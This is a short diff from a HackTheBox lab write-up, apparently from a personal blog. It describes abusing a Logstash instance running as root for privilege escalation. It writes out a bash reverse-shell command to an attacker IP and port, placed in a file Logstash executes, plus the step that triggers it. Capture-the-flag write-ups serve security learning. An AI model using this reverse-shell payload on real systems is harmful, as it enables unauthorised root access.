kmahyyg/kmahyyg.github.io/content/hioscp/2019-htb-writeup10.md

 }
 ```

-Logstash collects unstructured data from log files and other sources, converts it into structured data, and inserts it into elasticsearch.
+Logstash(running by root) collects unstructured data from log files and other sources, converts it into structured data, and inserts it into elasticsearch.
+Executing the command is running by Logstash.
 According to the config, we build payload using this command: `echo 'Ejecutar comando : /bin/bash -i >& /dev/tcp/10.10.16.118/33938 0>&1' > /opt/kibana/logstash_sht2a`

 Then access `http://10.10.10.115:9200/*` to let the elasticsearch refresh its data, then wait about 10s.